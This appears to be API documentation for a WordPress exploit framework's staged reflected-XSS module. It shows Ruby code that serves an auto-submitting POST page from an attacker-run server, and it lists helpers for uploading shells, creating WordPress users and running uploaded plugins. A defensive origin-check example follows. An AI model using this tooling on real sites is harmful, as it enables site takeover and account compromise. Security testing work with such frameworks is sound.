Module: Wpxf::WordPress::StagedReflectedXss

Includes:
ReflectedXss
Defined in:
lib/wpxf/wordpress/staged_reflected_xss.rb

Overview

Provides reusable functionality for reflected XSS modules.

Instance Method Summary

Methods included from Xss

#upload_shell, #wordpress_js_create_user, #xss_ascii_encoded_include_script, #xss_host, #xss_include_script, #xss_path, #xss_shell_success, #xss_url, #xss_url_and_ascii_encoded_include_script

Methods included from Plugin

#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute

Methods included from Net::HttpServer

#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #start_http_server, #stop_http_server

Instance Method Details

#create_basic_post_script(url, fields) ⇒ Object

Create a basic POST script with the specified fields. All values in the script will be wrapped in double quotes.

Parameters:

  • url (String)

    the vulnerable URL.

  • fields (Hash)

    the fields and values to inject into the script.



# File 'lib/wpxf/wordpress/staged_reflected_xss.rb', line 52

def create_basic_post_script(url, fields)
  json = ''
  fields.each_with_index do |(k, v), i|
    if i < fields.size - 1
      json += "\"#{k}\": \"#{v}\",\n"
      next
    end

    json += "\"#{k}\": \"#{v}\"\n"
  end

  %|
    <html><head></head><body><script>
      #{js_post}
      post('#{url}', {
        #{json}
      });
    </script></body></html>
  |
end

#initial_req_path ⇒ String

Returns the path to use for the initial request.

Returns:

  • (String)

    the path to use for the initial request.



# File 'lib/wpxf/wordpress/staged_reflected_xss.rb', line 21

def initial_req_path
  normalized_option_value('initial_req_path')
end

#initial_script ⇒ String

Returns the initial script that should be served to automate a form submission to the vulnerable page.

Returns:

  • (String)

    the initial script that should be served to automate a form submission to the vulnerable page.



# File 'lib/wpxf/wordpress/staged_reflected_xss.rb', line 45

def initial_script
  nil
end

#initialize ⇒ Object

Initialize a new instance of Wpxf::WordPress::StagedReflectedXss.



# File 'lib/wpxf/wordpress/staged_reflected_xss.rb', line 8

def initialize
  super
  register_option(
    StringOption.new(
      name: 'initial_req_path',
      desc: 'The path to be used to identify the initial request',
      required: true,
      default: Utility::Text.rand_alpha(rand(5..10))
    )
  )
end

#on_http_request(path, params, headers) ⇒ String

Invoked when an HTTP request is made to the server.

Parameters:

  • path (String)

    the path requested.

  • params (Hash)

    the query string parameters.

  • headers (Hash)

    the HTTP headers.

Returns:

  • (String)

    the response body to send to the client.



# File 'lib/wpxf/wordpress/staged_reflected_xss.rb', line 30

def on_http_request(path, params, headers)
  if path.eql? normalize_uri(xss_path, initial_req_path)
    emit_info 'Initial request received...'
    { type: 'text/html', body: initial_script }
  else
    super
  end
end

#run ⇒ Boolean

Run the module.

Returns:

  • (Boolean)

    true if successful.



# File 'lib/wpxf/wordpress/staged_reflected_xss.rb', line 75

def run
  if initial_script.nil?
    raise 'Required method "initial_script" has not been implemented'
  end

  super
end

#url_with_xss ⇒ String

Returns the URL to send the user to which contains the XSS vector.

Returns:

  • (String)

    the URL to send the user to which contains the XSS vector.



# File 'lib/wpxf/wordpress/staged_reflected_xss.rb', line 40

def url_with_xss
  normalize_uri(xss_url, initial_req_path)
end
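
A defender-side check for the staged flow documented above, in which a page served from another host auto-submits a POST to the WordPress site, so the request arrives carrying a foreign Origin. This is an added example, not WPXF code; SITE_ORIGIN, the request hash layout and the sample requests are constructed assumptions.

```ruby
require 'uri'

# Added example, not WPXF code. SITE_ORIGIN and the request hashes are assumptions.
SITE_ORIGIN = 'https://blog.example.test'
STATE_CHANGING = %w[POST PUT PATCH DELETE].freeze

# Reduce a URL to scheme://host[:port]; nil when it has no scheme and host
# (this covers the literal "null" origin and missing headers).
def origin_of(url)
  uri = URI.parse(url.to_s)
  return nil unless uri.scheme && uri.host

  scheme = uri.scheme.downcase
  default_port = scheme == 'https' ? 443 : 80
  port = uri.port == default_port ? '' : ":#{uri.port}"
  "#{scheme}://#{uri.host.downcase}#{port}"
rescue URI::InvalidURIError
  nil
end

# True when a state-changing request did not originate from the site itself.
# Policy choice in this example: a missing or opaque Origin and Referer is
# treated as suspect rather than allowed.
def cross_site_post?(req, site_origin = SITE_ORIGIN)
  return false unless STATE_CHANGING.include?(req[:method].to_s.upcase)

  source = origin_of(req[:origin]) || origin_of(req[:referer])
  source.nil? || source != origin_of(site_origin)
end

# Constructed sample requests (hosts use documentation/test ranges).
SAMPLE_REQUESTS = [
  { method: 'POST', path: '/wp-admin/admin.php', origin: 'https://blog.example.test',
    referer: 'https://blog.example.test/wp-admin/' },
  { method: 'POST', path: '/wp-admin/admin.php', origin: 'http://203.0.113.7:8080',
    referer: 'http://203.0.113.7:8080/abcdefg' },
  { method: 'POST', path: '/wp-admin/admin.php', origin: 'null', referer: nil },
  { method: 'GET', path: '/', origin: nil, referer: 'http://203.0.113.7:8080/x' }
].freeze

SAMPLE_REQUESTS.each do |req|
  verdict = cross_site_post?(req) ? 'FLAG' : 'ok'
  puts "#{verdict}  #{req[:method]} #{req[:path]} origin=#{req[:origin].inspect}"
end
```

The same comparison can run as a log-review rule or as a request filter in front of the admin endpoints; it complements, and does not replace, per-request nonces and output encoding on the reflected parameter.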